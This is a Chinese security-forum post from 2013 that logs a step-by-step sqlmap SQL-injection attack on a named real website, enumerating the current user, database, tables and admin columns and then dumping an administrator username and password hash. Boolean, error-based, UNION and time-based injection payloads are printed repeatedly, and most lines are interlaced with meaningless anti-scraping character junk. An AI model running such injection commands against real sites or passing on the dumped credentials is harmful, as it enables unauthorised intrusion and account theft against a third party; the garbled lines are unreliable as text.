找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2427|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
6 d% R; H- e* y4 E$ s& lms "Mysql" --current-user       /*  注解:获取当前用户名称8 ^% R% e7 O8 s. s
    sqlmap/0.9 - automatic SQL injection and database takeover tool: n- }3 ]+ x+ y! @: P8 N
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54# P  K+ A, r+ `) H, k
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, v3 p# t9 x6 P7 U
    session file
    ) S0 Q- z$ Y9 e8 S7 C& f. H[16:53:54] [INFO] resuming injection data from session file0 G/ V% X. q) j' B" V4 g: G& H( C
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    / u7 t- r* ]7 v[16:53:54] [INFO] testing connection to the target url" u& F/ i" L+ {: K7 @
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 T$ b# M0 s* s' b# I8 q# r/ |
    sts:
    $ D8 Y+ Y9 m5 g& h$ r---7 `9 B. G: ^- E# [6 A
    Place: GET, y# F" D8 p2 T4 c
    Parameter: id
    / y0 |3 @6 u9 E, N7 Z    Type: boolean-based blind( s3 s: J$ `6 f, S' ?3 s
        Title: AND boolean-based blind - WHERE or HAVING clause
      ~2 m9 x( r6 D) b% x- D    Payload: id=276 AND 799=799# }$ ?9 O$ ^: k
        Type: error-based( R- w3 k( u. F4 _. d, t
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    3 v6 u4 U6 Z1 s  k! z    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 m- T7 D& u; W9 o
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58- |* S  _- V/ G* A$ B* z
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)  X  E0 j) j" B
        Type: UNION query& q8 ]! A+ \3 Y: Q$ T- ^+ F" B
        Title: MySQL UNION query (NULL) - 1 to 10 columns, z9 D: U3 @, m7 r+ k
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 d( v2 L" k, i  e' e
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' p; V4 [: p& r
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ' E* K, W/ h3 x, F+ S# x    Type: AND/OR time-based blind, i  H6 F( ]* q9 v
        Title: MySQL > 5.0.11 AND time-based blind
    ) A" A: p1 o2 i/ n4 j    Payload: id=276 AND SLEEP(5)" e. `9 D9 N& k' [! v- m
    ---
    ; M2 a& N6 f1 p; O) S[16:53:55] [INFO] the back-end DBMS is MySQL# z7 ~0 v0 P& Z- `6 ~% w
    web server operating system: Windows( ~, b( W" w  v. }6 r  F
    web application technology: Apache 2.2.11, PHP 5.3.0
    * [9 _- @& q, r# Q" j4 Y9 sback-end DBMS: MySQL 5.0
    , @5 ]5 C9 B2 j8 ~! v" m7 {, |, m, d[16:53:55] [INFO] fetching current user
    8 d: A3 ~- h7 xcurrent user:    'root@localhost'   9 L: u, i6 }2 u( R0 [
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou  ^2 M: _* L. v. ?* G, }
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    + a9 R. r* Z2 V( y+ P9 V" A  G
    4 }1 N6 H6 r9 l# }+ J4 e" P0 OD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ( N# M6 A8 J! ]6 ~8 r" ums "Mysql" --current-db                  /*当前数据库- v1 v4 z- o' x  O$ D
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    3 m4 c9 q/ k5 }" ~' a    http://sqlmap.sourceforge.net
  • starting at: 16:54:169 Z9 N, b1 P7 A; X! L
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ( N$ R* k2 l* N session file1 ], M" O( P( F# E( v% s1 n  Y% B5 H
    [16:54:16] [INFO] resuming injection data from session file
    * c0 _/ ~* M; T8 T% z0 ^$ T[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    $ D. t& K; o, T1 x, ~4 `[16:54:16] [INFO] testing connection to the target url
    3 @0 }1 `& K: G5 vsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 a6 t- k: l8 }- ?" U% `0 a
    sts:7 u7 b4 p% r4 I! \  L! C4 E6 v
    ---# t1 z0 k+ V; }+ m) C7 j
    Place: GET
    2 n& K5 ^8 T5 f: |Parameter: id
    , B2 }. Z" @$ c) m) W- L$ r    Type: boolean-based blind
    ) b1 ~6 N$ p% P0 T    Title: AND boolean-based blind - WHERE or HAVING clause
    3 D  B  J( W# I1 B0 b* Z) y    Payload: id=276 AND 799=799! F& b- z3 [+ [" K+ w2 _
        Type: error-based
    ' a% n1 D6 |$ F( q7 j    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ {; d! k% T7 K2 Z
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( V) h: d& W. M' {0 X2 x- o4 ~
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    & ~# i7 U0 s! }4 v2 ?2 K' q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 C4 C, V% m. b; B8 U  b
        Type: UNION query* N4 H! M1 ?5 \& @) C& q; s& ^) E5 r6 S
        Title: MySQL UNION query (NULL) - 1 to 10 columns8 O* W+ E5 A" D& Q
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" g- m1 A7 Y% x+ F  w
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 I7 a  C2 H! u* f
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: G4 h# g) s! q4 O/ U
        Type: AND/OR time-based blind7 i+ s$ n, |  o9 b# k
        Title: MySQL > 5.0.11 AND time-based blind
    : P9 x4 y; S4 g4 `    Payload: id=276 AND SLEEP(5)
    7 O! L6 B+ b- Q---
    2 g! ^" X$ R) X. ^5 I3 L[16:54:17] [INFO] the back-end DBMS is MySQL
    ) K$ W2 R' Q7 C7 kweb server operating system: Windows
    8 E( B; L& x: yweb application technology: Apache 2.2.11, PHP 5.3.0& W( j; |4 O- M" g7 P
    back-end DBMS: MySQL 5.0, K: d7 `( j( w$ V( s4 ^5 R
    [16:54:17] [INFO] fetching current database
    4 _3 |4 r0 o/ b9 J( b4 y7 _current database:    'wepost', X3 T1 L- D  A; ?. T# B" v6 j& z4 Y
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    . N) q' N+ j. l/ f* w: ntput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    $ h4 O7 C! M; o2 V7 I9 S$ mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    & Q* E. ]1 Y& `8 M2 mms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名, D# e. B) P4 w, }, A# t5 Q; U
        sqlmap/0.9 - automatic SQL injection and database takeover tool, H1 A' l) B: W6 Z4 l
        http://sqlmap.sourceforge.net
  • starting at: 16:55:250 ?, e+ ~# b" U
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ d- |. N9 d8 H/ o! y
    session file
    * Q( b% ?+ W3 U  H. J5 x4 G$ n[16:55:25] [INFO] resuming injection data from session file
    / _. j* W5 |  T+ X. L# b! g: L1 X, A[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file/ V9 X1 j$ h& p- g5 Q0 V9 T$ J
    [16:55:25] [INFO] testing connection to the target url
    0 {  u2 I% e: t( Csqlmap identified the following injection points with a total of 0 HTTP(s) reque6 N8 F, N* R! m
    sts:
    4 Q5 i. c7 T8 t" l; L---( ^, B! J" j+ [7 B$ P' U
    Place: GET7 P9 U. m: U; H* \8 o3 {
    Parameter: id
    ! J5 _7 {. B8 v/ O* }    Type: boolean-based blind
    ; q9 J9 D9 I: M/ ~    Title: AND boolean-based blind - WHERE or HAVING clause4 I1 `& L$ E( n# ~' i' r6 y
        Payload: id=276 AND 799=799
    2 ], b3 Q- {& J! R! j) P    Type: error-based
    ; Q- v3 \0 Y" G3 D9 h% i* S- i/ @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    4 h+ c+ l& R9 ~6 P+ E    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: O/ i, u8 g+ G, C
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* u" r7 {0 a( U1 C5 f  v4 t
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    + ]3 t" P; I# k0 Q; {    Type: UNION query9 d+ d0 F$ ~2 ^: g- s2 M( `
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    4 Y; Z! E  H8 I/ c    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 w8 x# X4 r) ^1 l) [: D$ z
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ x9 P$ }) T7 u; W4 V1 b
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ( s  e6 I9 X" [% d    Type: AND/OR time-based blind- C) v% w2 `4 A( x
        Title: MySQL > 5.0.11 AND time-based blind9 ]+ \! [; m# _( n' v, t
        Payload: id=276 AND SLEEP(5)
    ! x/ N" G& E, H2 D, y---! f/ E' A; N! G. Z0 }
    [16:55:26] [INFO] the back-end DBMS is MySQL2 K1 G" E7 K8 d1 e7 f0 J
    web server operating system: Windows$ C; ~+ ?: r. a& M+ z+ Q
    web application technology: Apache 2.2.11, PHP 5.3.0* N2 n; H" u' l# b9 X( O( w5 v: }
    back-end DBMS: MySQL 5.0
    7 S0 g, f: }1 L6 u( @$ ~, L; J[16:55:26] [INFO] fetching tables for database 'wepost'
    6 x, T3 ?- O$ j) r9 k6 e1 d  B[16:55:27] [INFO] the SQL query used returns 6 entries+ s0 c# U3 n0 o2 E
    Database: wepost
      e7 o- g9 Y' m[6 tables]3 g7 K5 r% n1 v( M
    +-------------+; e: W- {9 U0 f* m) x
    | admin       |: b% r1 Z( o4 G0 |& s
    | article     |. w* x& }1 i9 g, Q
    | contributor |
    2 z3 Q9 F0 Z! ^| idea        |
    " V( o( H9 e) K8 k. F+ ?1 l| image       |/ x- j7 w4 ~1 O( i* A( p
    | issue       |9 F- w$ @+ w$ x' I
    +-------------+
    + l# g6 k! D  K[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    8 D1 n" E6 z6 Y6 {1 jtput\www.wepost.com.hk'
  • shutting down at: 16:55:333 i0 v: |3 }" a7 d  Q8 h: T
      t. K" q2 ]' k% `
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    . Q1 _4 v2 L8 Z- vms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名0 a6 U8 L0 o8 q# N
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    1 ^0 O- Q2 |  l6 m    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    % A# M" f5 i( `+ d0 B, `sqlmap identified the following injection points with a total of 0 HTTP(s) reque: l5 m% k3 g( w0 j& N- V
    sts:9 g' j! H  N7 Z
    ---! r# v/ `- _2 H8 l' o; W, A* w
    Place: GET& J# N- L/ ]. P' r) ~6 I+ F( J2 m
    Parameter: id
    4 y) `" C+ T& Z) t    Type: boolean-based blind
    7 S. }% K" f, j0 z) n) q    Title: AND boolean-based blind - WHERE or HAVING clause4 [9 H9 N* h! F; C% C9 X$ Y% y5 ?
        Payload: id=276 AND 799=799
    * `3 n+ s: C  ]    Type: error-based) {% l9 T, p  O" L6 ^6 d6 t9 U4 W
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 V1 h, W* c& v* Z
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ' e+ k- c2 p& S% I; q3 D120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% a" f: e" N5 _1 s; w1 Q
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); i+ j; u$ ?. N1 C3 ]# ]7 n
        Type: UNION query* M. S% O4 a# l8 f" \7 s
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    4 d4 q& H& t5 I* b( ^; G" k    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ! Z+ K" U) R- j; A  g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    # z% r7 z2 l- }  NCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ E( X) ^5 j( d* _
        Type: AND/OR time-based blind* X/ W) x4 I& R$ f. g- I/ G5 j
        Title: MySQL > 5.0.11 AND time-based blind
    $ d7 k- B8 h- Y, E% g    Payload: id=276 AND SLEEP(5), q- N1 A  o) b+ B$ H) e
    ---
    6 K7 l, J5 P7 U/ L  T: H$ x( lweb server operating system: Windows
    1 n4 j, c8 ?4 O  C5 d2 _: Vweb application technology: Apache 2.2.11, PHP 5.3.0: w! E  e4 F" Y
    back-end DBMS: MySQL 5.0( @' o  ^; i! x6 Z( n+ ?, s* [. b
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    : S  Y6 O: o0 Rssion': wepost, wepost
    6 U( U5 {$ |; o8 v! j) Y' d5 aDatabase: wepost
    3 Z! R) S# Q5 Y9 k* O% W' KTable: admin- u$ q  g* n$ g/ f
    [4 columns]
    0 y& d0 b9 e5 `+ C5 Z3 }8 Y6 T3 i8 N3 n+----------+-------------+9 X- O' B( {3 B, b
    | Column   | Type        |1 {3 `+ s! d2 |! j7 E) n4 h( x5 L
    +----------+-------------+
    0 Q0 e! O9 }# N| id       | int(11)     |
    0 {* ~8 x( q7 _2 J, S) L% s" k: i| password | varchar(32) |
    ' W) \5 @9 y8 e& e| type     | varchar(10) |
    9 n6 g8 z% z% }+ o! P| userid   | varchar(20) |
    , G; o) g8 s, @  C) l+----------+-------------+
    . n+ V* w' m9 @8 g+ q
  • shutting down at: 16:56:19
    9 V  N" ?: |% A( \; I  G6 M  o, N6 q8 N7 g* S$ E
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    0 ?+ ?0 {5 y7 q: f# n9 cms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容2 q3 q) p! q/ z) G5 |4 P* H
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    4 F4 C: s- ^; N% s    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    * p8 E, U. s, z4 B7 C% V9 U0 Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque7 z% F7 _# h" g) r$ h1 I9 o
    sts:
    - ]$ |: i# C" v/ E- J( d---
    $ m( d# x$ _9 T; lPlace: GET
    5 V5 e' `* Y( V8 fParameter: id
    # u3 B5 u4 g4 C+ z. ~    Type: boolean-based blind" q1 _& P9 p$ v( N$ L, }
        Title: AND boolean-based blind - WHERE or HAVING clause
    . E. }! d9 y' G3 o- m* G/ Q- F    Payload: id=276 AND 799=799
    : P% S1 n! L" i4 w- e" [$ T    Type: error-based- i0 I$ S5 T* B- D/ }' m
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ v# k4 S3 O1 ?# t8 b) F4 k# j
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    * o; Q8 N5 T6 ]5 D3 f& q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! @4 u- E% [' u. a; I- o
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
      N. ~: T, b5 d7 V    Type: UNION query
    4 N1 X) I7 @& u  K/ l7 U  i# L    Title: MySQL UNION query (NULL) - 1 to 10 columns9 I. ]" N  `3 x* |! P
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- P6 t% x- P* t) p; }7 e. r
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; h& t1 L. c; Q8 p, z; L. ~' v5 ]0 Z) s
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    1 @; H, z. ^) n; F    Type: AND/OR time-based blind+ b2 C3 b/ P2 |9 g  L
        Title: MySQL > 5.0.11 AND time-based blind/ `1 I2 p. R7 s- _  X, P
        Payload: id=276 AND SLEEP(5)
    7 M4 l- s. k- ^7 \3 I% S---
    - {! h  I# ]" g* f! `web server operating system: Windows
    & e7 q" @9 \. p# W. D: Iweb application technology: Apache 2.2.11, PHP 5.3.0
    8 c+ }4 w& _2 x( Z$ z6 kback-end DBMS: MySQL 5.0% u# K: ?4 ]% L$ x
    recognized possible password hash values. do you want to use dictionary attack o7 u0 ^* ?! ]+ b$ I
    n retrieved table items? [Y/n/q] y
    / T2 x4 |9 A- G! m9 @, ^: Iwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    . a7 a( b  H8 {. ido you want to use common password suffixes? (slow!) [y/N] y2 T$ S. C0 R* |" `! U1 q4 m8 F
    Database: wepost+ V$ c7 {7 @. G, p
    Table: admin
      U# _7 {2 |) i& V+ a[1 entry]
    7 {0 G9 @* D* W& k( O" p. y+----------------------------------+------------+
    ( r! l- S/ u3 g/ S  ~# b$ \0 i9 M; w| password                         | userid     |. c& K- [) n# J9 z5 Q
    +----------------------------------+------------+0 A, L  o4 \3 s% H! r
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    8 N& x. ^" O* ]0 `+----------------------------------+------------+; |: t: K$ _4 l9 l
  • shutting down at: 16:58:140 z* J& F  X3 M2 z) r
    " W: M) K  b4 r5 g
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表